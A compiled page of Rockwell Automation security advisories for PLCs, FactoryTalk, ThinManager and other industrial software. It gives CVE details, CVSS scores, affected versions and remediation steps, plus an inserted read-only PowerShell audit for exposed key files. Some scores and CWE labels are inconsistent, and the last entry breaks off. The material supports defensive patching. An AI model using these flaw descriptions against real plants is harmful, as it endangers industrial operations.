The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

  • JSON CVE-2024-40620

Medium
SD1684 | Micro850/870 Vulnerable to denial-of-service Vulnerability via CIP/Modbus Port
Published Date:
August 12, 2024
Last Updated:
October 16, 2024
CVE IDs:
CVE-2024-7567
CVSS Scores (v3.1):
5.3
CVSS Scores (v4.0):
6.9
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 8/13/24

Last Updated: 8/13/2024

Revision Number: 1.0

CVSS Score: v3.1: 5.3/10, v4.0: 6.9/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments. 

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Software Version

Corrected in Software Version

PLC - Micro850/870 (2080-L50E/2080-L70E)

v20.011

v22.011

VULNERABILITY DETAILS

Rockwell Automation used the latest versions of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7567 IMPACT

A denial-of-service vulnerability exists via the CIP/Modbus port in the affected products. If exploited, CIP/Modbus communication may be disrupted for a short duration.

CVSS 3.1 Base Score: 5.3
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS 4.0 Base Score: 6.9
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
CWE: CWE-400: Uncontrolled Resource Consumption

Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply security best practices, if possible.

·       For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·       CVE-2024-7567

Medium
SD1683 | DLL Hijacking Vulnerability Exists in Emulate3D™
Published Date:
August 12, 2024
Last Updated:
November 19, 2024
CVE IDs:
CVE-2024-6079
CVSS Scores (v3.1):
6.7
CVSS Scores (v4.0):
5.4
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Published Date: 8/13/2024

Updated Date: 8/13/2024

Revision Number: 1.0

CVSS: v3.1: 6.7 , 4.0: 5.4

 

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Software Version

Corrected in Software Version

 Emulate3D™

 17.00.00.13276

17.00.00.13348

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6079 IMPACT

A vulnerability exists in the affected product that could be leveraged for a DLL hijacking attack. The application loads shared libraries that are readable and writable by any user. If exploited, a malicious user could replace one of those libraries with a malicious DLL and have the application execute attacker-controlled code.

CVSS Base Score (v3.1): 6.7
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS Base Score (v4.0): 5.4
CVSS Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-610: Externally Controlled Reference to a Resource in Another Sphere
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the following risk mitigations, if possible:

·       Update to the corrected software version, 17.00.00.13348.

·       For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

·       JSON CVE-2024-6079

High
SD1682 | Chassis Restrictions Bypass Vulnerability in Select Logix Devices
Published Date:
July 31, 2024
Last Updated:
October 16, 2024
CVE IDs:
CVE-2024-6242
CVSS Scores (v3.1):
8.4
CVSS Scores (v4.0):
7.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Published Date: August 1, 2024

Last updated: August 29, 2024

Revision Number: 2.0

August 29, 2024 - Updated Affected Products and Solution chart for 1756-EN2T, 1756-EN2F, 1756-EN2TR, 1756-EN3TR

CVSS Score: v3.1: 8.4/10, v4.0: 8.5/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
ControlLogix® 5580 (1756-L8z) | V28 | V32.016, V33.015, V34.014, V35.011 and later
GuardLogix® 5580 (1756-L8zS) | V31 | V32.016, V33.015, V34.014, V35.011 and later
1756-EN4TR | V2 | V5.001 and later
1756-EN2T, Series A/B/C | v5.007 (unsigned) / v5.027 (signed) | No fix for Series A/B/C. Upgrade to Series D.
1756-EN2F, Series A/B | v5.007 (unsigned) / v5.027 (signed) | No fix for Series A/B. Upgrade to Series C.
1756-EN2TR, Series A/B | v5.007 (unsigned) / v5.027 (signed) | No fix for Series A/B. Upgrade to Series C.
1756-EN3TR, Series A | v5.007 (unsigned) / v5.027 (signed) | No fix for Series A. Upgrade to Series B.
1756-EN2T, Series D | V10.006 | V12.001 and later
1756-EN2F, Series C | V10.009 | V12.001 and later
1756-EN2TR, Series C | V10.007 | V12.001 and later
1756-EN3TR, Series B | V10.007 | V12.001 and later
1756-EN2TP, Series A | V10.020 | V12.001 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. Claroty reported the following vulnerability. 

CVE-2024-6242 IMPACT

A vulnerability exists in the affected products that allows a threat actor to bypass the Trusted® Slot feature in a ControlLogix® controller. If exploited on any affected module in a 1756 chassis, a threat actor could potentially execute CIP commands that modify user projects and/or device configuration on a Logix controller in the chassis.  

CVSS Base Score v3.1: 8.4/10

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:H

CVSS Base Score v4.0: 7.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:H/SC:L/SI:H/SA:H

CWE-420: Unprotected Alternate Channel

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected firmware who are not able to upgrade to one of the corrected versions are encouraged to apply the following mitigation and security best practices, where possible.

·       Limit the allowed CIP commands on controllers by setting the mode switch to the RUN position.

·       Security Best Practices

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

·       JSON CVE-2024-6242

·       System Security Design Guidelines

High
SD1681 | Privilege Escalation Vulnerability in Pavilion8®
Published Date:
July 16, 2024
Last Updated:
November 20, 2024
CVE IDs:
CVE-2024-6435
CVSS Scores (v3.1):
8.8
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: July 16, 2024 
Last updated: July 16, 2024

Revision Number: 1.0

CVSS Score: v3.1: 8.8/10, v4.0: 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version(s) | Corrected in Software Revision
Pavilion8® | v5.15.00, v5.15.01, v5.16.00, v5.17.00, v5.17.01, v5.20.00 | v6.0

Mitigations and Workarounds

Users using the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

  • Limit access to only users who need it.

  • Periodically review user access and privileges to confirm accuracy.

  • Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.  

CVE-2024-6435 IMPACT

A privilege escalation vulnerability exists in the affected products which could allow a malicious user with basic privileges to access functions which should only be available to users with administrative level privileges. If exploited, an attacker could read sensitive data, and create users. For example, a malicious user with basic privileges could perform critical functions such as creating a user with elevated privileges and reading sensitive information in the “views” section.  

CVSS 3.1 Base Score: 8.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-732: Incorrect Permission Assignment for Critical Resource

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

ADDITIONAL RESOURCES

  • JSON CVE-2024-6435

High
SD1680 | Major nonrecoverable fault in 5015 – AENFTXT
Published Date:
July 10, 2024
Last Updated:
November 20, 2024
CVE IDs:
CVE-2024-6089
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Major nonrecoverable fault in 5015-AENFTXT

Published Date: 7/16/2024

Updated Date: 7/16/2024

Revision Number: 1.0

CVSS: v3.1: 7.5, v4.0: 8.7

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
5015-AENFTXT | v2.011 | v2.012

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6089 IMPACT

An input validation vulnerability exists in the affected products: when a manipulated PTP packet is sent, the secondary adapter enters a major nonrecoverable fault. If exploited, a power cycle is required to recover the product.

CVSS Base Score (v4.0): 8.7/10
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CVSS Base Score (v3.1): 7.5/10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Update to the corrected firmware revision, v2.012.

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.   

  • JSON CVE-2024-6089

High
SD1679 | Input Validation Vulnerability exists in the SequenceManager™ Server
Published Date:
July 10, 2024
Last Updated:
September 27, 2024
CVE IDs:
CVE-2024-6436
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: July 16, 2024

Last updated: October 1, 2024

Revision Number: 2.0

October 1, 2024 - Updated CVE Number.

CVSS Score: v3.1 7.5/10, v4.0 8.7/10

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Software Versions | Corrected in Software Version
SequenceManager™ | <v2.0 | v2.0 or later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6436 IMPACT

An input validation vulnerability exists in the affected products which could allow a malicious user to send malformed packets to the server and cause a denial-of-service condition. If exploited, the device would become unresponsive, and a manual restart would be required for recovery. Additionally, if exploited, there could be a loss of view for the downstream equipment sequences in the controller. Users would not be able to view the status of, or command, the equipment sequences; however, the equipment sequences would continue to execute uninterrupted.

CVSS 3.1 Base Score: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-428: Unquoted Search Path or Element

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

·       Security Best Practices

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

·       JSON CVE-2024-6436

Medium
SD1678 | Unsecured Private Keys in FactoryTalk® System Services
Published Date:
July 02, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE-2024-6325, CVE-2024-6236
CVSS Scores (v3.1):
6.5, 5.9
CVSS Scores (v4.0):
6.0, 1.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: July 11, 2024

Last updated: July 11, 2024

Revision Number: 1.0

CVSS Score: v3.1: 6.5/10, 5.9/10; v4.0: 6.0/10, 1.8/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Version | Corrected Version
FactoryTalk® System Services (installed via FTPM) | v6.40 | V6.40.01
FactoryTalk® Policy Manager (FTPM) | v6.40 | V6.40.01

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-6325 IMPACT

The v6.40 release of FactoryTalk® Policy Manager allowed the private keys to be insecurely stored with read and execute privileges for the Windows group, ‘Everyone’. These keys are used to generate digital certificates and pre-shared keys. This vulnerability could allow a malicious user with access to the machine to obtain private keys. If obtained, a malicious user could impersonate resources on the secured network. For customers using FactoryTalk® Policy Manager v6.40 who mitigated CVE-2021-22681 and CVE-2022-1161 by implementing CIP security and did not update to the versions of the software that contain the remediation, this vulnerability could allow a threat actor to exploit CVE-2022-1161 and CVE-2022-1161.

CVSS Base Score v3.1: 6.5/10

CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CVSS Base Score v4.0: 6.0/10

CVSS Vector String: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N

CWE: CWE-269: Improper Privilege Management

CVE-2024-6236 IMPACT

An exposure of sensitive information vulnerability exists in the FactoryTalk® System Service. A malicious user could exploit this vulnerability by starting a back-up or restore process, which temporarily exposes private keys, passwords, pre-shared keys, and database folders when they are temporarily copied to an interim folder. This vulnerability is due to the lack of explicit permissions set on the backup folder. If private keys are obtained by a malicious user, they could impersonate resources on the secured network.

CVSS Base Score v3.1: 5.9/10

CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N

CVSS Base Score v4.0: 1.8/10

CVSS Vector String: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N

CWE: CWE-269: Improper Privilege Management

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software are encouraged to implement the following steps to invalidate the existing vulnerable private keys/digital certificates and regenerate new secure ones.

·       Clear CIP Security configurations from devices and from FactoryTalk® Policy Manager

·       Update FactoryTalk® System Services and FactoryTalk® Policy Manager to v6.40.01

·       Redeploy CIP Security Policy 

Detailed steps are below (FactoryTalk System Services (FTSS) is updated through the installation of FactoryTalk Policy Manager (FTPM)).

1)  Remove deployed security policy from all devices using FactoryTalk® Policy Manager (FTPM):

    a.  Open FTPM.

    b.  Document all Zone’s security settings and all Conduit’s settings, as you must re-create them after updating FTPM.

    c.  Change all device ports’ Policies > Zone values to the “Unassigned” Zone.

    d.  Delete all zones and conduits.

    e.  Deploy (CIP). Ensure that all endpoints were reset successfully.

    f.  [migrating from v6.40 only] Deploy (OPC UA). Ensure all endpoints were reset successfully.

        i.  For any OPC UA clients, perform whatever steps are required by those clients to remove the previously applied certificates.

    g.  Close FTPM.

2)  Delete the \FTSS_backup folder:

    a.  c:\ProgramData\Rockwell\RNAServer\Global\RnaStore\FTSS_Backup

3)  Delete the \keystore folder:

    a.  c:\ProgramData\Rockwell Automation\FactoryTalk System Services\keystore

4)  Delete any backup copies of the \keystore folder. They will be named the same as the \keystore folder but with a suffix appended, like:

    a.  c:\ProgramData\Rockwell Automation\FactoryTalk System Services\keystore_source_2024_04_25_12_25_38_541566

5)  Delete the PSKs.json file:

    a.  c:\ProgramData\Rockwell Automation\FactoryTalk System Services\PSKs.json

6)  Delete any backup copies of the PSKs.json file. They will be named the same as the PSKs.json file but with a suffix appended, like:

    a.  c:\ProgramData\Rockwell Automation\FactoryTalk System Services\PSKs.json_source_2024_05_17_07_38_25_200356

7)  Install FactoryTalk® Policy Manager version 6.40.01.

    a.  Restart the computer when prompted at the end of the install.

8)  Open FTPM. FTPM will attempt to connect to the FactoryTalk® System Services web server before proceeding.

9)  If FTPM could not successfully connect to FactoryTalk® System Services (FTSS), it is because the FTSS service hasn’t started yet. It will eventually start, or you can start the FTSS service manually in Windows Services.

10) Re-create the original Zones.

11) Move the devices from the unassigned Zone back to their original zones.

12) Re-create the original Conduits.

13) Deploy (CIP endpoints).

14) [migrating from v6.40 only] Deploy (OPC UA endpoints).

    a.  For any OPC UA client endpoints, manually apply the newly generated certificates from this deploy.

Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

·       Security Best Practices
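As an added example (not Rockwell Automation's code), the PowerShell audit below checks the locations named in the steps above for the two conditions this advisory describes: an ACL entry granting the 'Everyone' group access to the key material, and leftover backup copies or an FTSS_Backup folder still present after remediation. It assumes the default paths given in the steps and only reports; it deletes nothing.

```powershell
# Added audit script (not Rockwell Automation's code). It reads the locations
# listed in the SD1678 remediation steps and reports, without changing anything:
#   - ACL entries that grant the 'Everyone' group any access to the key material
#     (the condition behind CVE-2024-6325), and
#   - leftover keystore_source_* / PSKs.json_source_* copies or a surviving
#     FTSS_Backup folder (the interim-copy exposure behind CVE-2024-6236).
# Paths are the defaults given in the advisory; adjust $FtssRoot and
# $BackupFolder if the installation differs.

$FtssRoot     = 'C:\ProgramData\Rockwell Automation\FactoryTalk System Services'
$BackupFolder = 'C:\ProgramData\Rockwell\RNAServer\Global\RnaStore\FTSS_Backup'

function Get-EveryoneAces {
    # Returns the ACEs on $Path whose principal is the 'Everyone' group
    # (well-known SID S-1-1-0); returns nothing if no such entry exists.
    param([Parameter(Mandatory)][string]$Path)
    $everyone = New-Object System.Security.Principal.SecurityIdentifier('S-1-1-0')
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        try { $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) -eq $everyone }
        catch { $false }   # unresolvable principal: not 'Everyone'
    }
}

function Get-FtssKeyMaterialFindings {
    param(
        [string]$Root   = $FtssRoot,
        [string]$Backup = $BackupFolder
    )
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Key material (steps 3 and 5) that still grants 'Everyone' access.
    foreach ($item in @('keystore', 'PSKs.json')) {
        $path = Join-Path $Root $item
        if (-not (Test-Path -LiteralPath $path)) { continue }
        foreach ($ace in (Get-EveryoneAces -Path $path)) {
            $findings.Add(("Everyone has {0} ({1}) on {2}" -f $ace.FileSystemRights, $ace.AccessControlType, $path))
        }
    }

    # 2. The interim backup folder that step 2 says to delete.
    if (Test-Path -LiteralPath $Backup) {
        $findings.Add("FTSS_Backup folder still present: $Backup")
        foreach ($ace in (Get-EveryoneAces -Path $Backup)) {
            $findings.Add(("Everyone has {0} ({1}) on {2}" -f $ace.FileSystemRights, $ace.AccessControlType, $Backup))
        }
    }

    # 3. Timestamped copies of the keystore or PSKs.json (steps 4 and 6).
    if (Test-Path -LiteralPath $Root) {
        Get-ChildItem -LiteralPath $Root -Force |
            Where-Object { $_.Name -like 'keystore_source_*' -or $_.Name -like 'PSKs.json_source_*' } |
            ForEach-Object { $findings.Add("Backup copy of key material still present: $($_.FullName)") }
    }

    # Leading comma keeps the list intact instead of unrolling it into the pipeline.
    return ,$findings
}

$results = Get-FtssKeyMaterialFindings
if ($results.Count -eq 0) {
    Write-Output 'OK: no Everyone access on FTSS key material and no leftover backup copies.'
} else {
    $results | ForEach-Object { Write-Output "FINDING: $_" }
    exit 1
}
```

Run it from an elevated prompt on the FTSS host after step 14; a non-zero exit means at least one of the advisory's cleanup steps is still outstanding.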

ADDITIONAL RESOURCES

·       JSON CVE-2024-6325

·       JSON CVE-2024-6236

Critical
SD1677 | ThinManager® ThinServer™ Improper Input Validation Vulnerabilities
Published Date:
June 20, 2024
Last Updated:
October 16, 2024
CVE IDs:
CVE-2024-5988, CVE-2024-5989, CVE-2024-5990
CVSS Scores (v3.1):
9.8, 7.5
CVSS Scores (v4.0):
9.3, 8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

ThinManager® ThinServer™ Improper Input Validation Vulnerabilities

Published Date: June 25, 2024

Last updated: June 25, 2024

Revision Number: 1.0

CVSS Score: v3.1: 9.8/10, 7.5/10; v4.0: 9.3/10, 8.7/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | First Known in Software Version | Corrected in Software Version (Available Here)
ThinManager® ThinServer™ | CVE-2024-5988, CVE-2024-5989 | 11.1.0 | 11.1.8
ThinManager® ThinServer™ | CVE-2024-5988, CVE-2024-5989 | 11.2.0 | 11.2.9
ThinManager® ThinServer™ | CVE-2024-5988, CVE-2024-5989 | 12.0.0 | 12.0.7
ThinManager® ThinServer™ | CVE-2024-5988, CVE-2024-5989 | 12.1.0 | 12.1.8
ThinManager® ThinServer™ | CVE-2024-5988, CVE-2024-5989 | 13.0.0 | 13.0.5
ThinManager® ThinServer™ | CVE-2024-5988, CVE-2024-5989 | 13.1.0 | 13.1.3
ThinManager® ThinServer™ | CVE-2024-5988, CVE-2024-5989 | 13.2.0 | 13.2.2
ThinManager® ThinServer™ | CVE-2024-5990 | 11.1.0 | 11.1.8
ThinManager® ThinServer™ | CVE-2024-5990 | 11.2.0 | 11.2.9
ThinManager® ThinServer™ | CVE-2024-5990 | 12.0.0 | 12.0.7
ThinManager® ThinServer™ | CVE-2024-5990 | 12.1.0 | 12.1.8
ThinManager® ThinServer™ | CVE-2024-5990 | 13.0.0 | 13.0.4
ThinManager® ThinServer™ | CVE-2024-5990 | 13.1.0 | 13.1.2

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations from the list below, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the potential risk of vulnerability.

·       Update to the corrected software versions via the ThinManager® Downloads Site

·       Limit remote access for TCP Port 2031 to known thin clients and ThinManager® servers.

·       Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. These vulnerabilities were discovered and reported to Rockwell Automation by security researchers at Tenable Network Security.

CVE-2024-5988 IMPACT

Due to improper input validation, an unauthenticated threat actor can send a malicious message to invoke a local or remote executable and cause a remote code execution condition on the affected device.

CVSS Base Score (v3.1): 9.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score (v4.0): 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-20: Improper Input Validation

CVE-2024-5989 IMPACT

Due to improper input validation, an unauthenticated threat actor can send a malicious message that injects SQL into the program and cause a remote code execution condition on the affected device.

CVSS Base Score (v3.1): 9.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Base Score (v4.0): 9.3/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-20: Improper Input Validation

CVE-2024-5990 IMPACT

Due to improper input validation, an unauthenticated threat actor can send a malicious message to a monitor thread within ThinServer™ and cause a denial-of-service condition on the affected device.

CVSS Base Score (v3.1): 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score (v4.0): 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-20: Improper Input Validation

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·       CVE-2024-5988 JSON

·       CVE-2024-5989 JSON

·       CVE-2024-5990 JSON

Critical
SD1676 | FactoryTalk® View SE v11 Information Leakage Vulnerability via Authentication Restriction
Published Date:
June 12, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE-2024-37368
CVSS Scores (v3.1):
9.8
CVSS Scores (v4.0):
9.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: June 13, 2024

Last updated: June 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 9.8/10, v4.0: 9.2/10

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® View SE | v11.0 | v14.0

Mitigations and Workarounds

Users using the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

  • It is recommended that users enforce proper access controls within the network and segment networks containing sensitive information using IPsec: https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1090456

  • Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.

CVE-2024-37368 IMPACT

A user authentication vulnerability exists in the affected product. The vulnerability allows a user from a remote system with FTView to send a packet to the customer’s server to view an HMI project. Because the server does not properly authenticate the request, this action is allowed without proper authentication verification.

CVSS 3.1 Base Score: 9.8/10

CVSS 4.0 Base Score: 9.2/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE-287: Improper Authentication

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

  • JSON CVE-2024-37368

High
SD1675 | FactoryTalk® View SE v12 Information Leakage Vulnerability via Authentication Restriction
Published Date:
June 12, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE-2024-37367
CVSS Scores (v3.1):
9.8
CVSS Scores (v4.0):
9.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: June 13, 2024

Last updated: June 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 9.8/10, v4.0: 9.2/10

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® View SE | v12.0 | V14.0 and later

Mitigations and Workarounds

Users using the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

  • It is recommended that users enforce proper access controls within the network and segment networks containing sensitive information using IPsec: https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1090456

  • Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.

CVE-2024-37367 IMPACT

A user authentication vulnerability exists in the affected product. The vulnerability allows a user from a remote system with FTView to send a packet to the customer’s server to view an HMI project. This action is allowed without proper authentication verification.

CVSS 4.0 Base Score: 8.2/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE-287: Improper Authentication

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

  • JSON CVE-2024-37367

High
SD1674 | FactoryTalk® View SE Local Privilege Escalation Vulnerability via Local File Permissions
Published Date:
June 12, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE-2024-37369
CVSS Scores (v3.1):
7.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: June 13, 2024

Last updated: June 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.8/10, v4.0: 8.5/10 

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Software Version | Corrected in Software Version
FactoryTalk® View SE | V12.0 | v14

Mitigations and Workarounds

Users using the affected software who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

  • Use the Secure Install option when installing FactoryTalk® Services Platform.

  • Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.

CVE-2024-37369 IMPACT

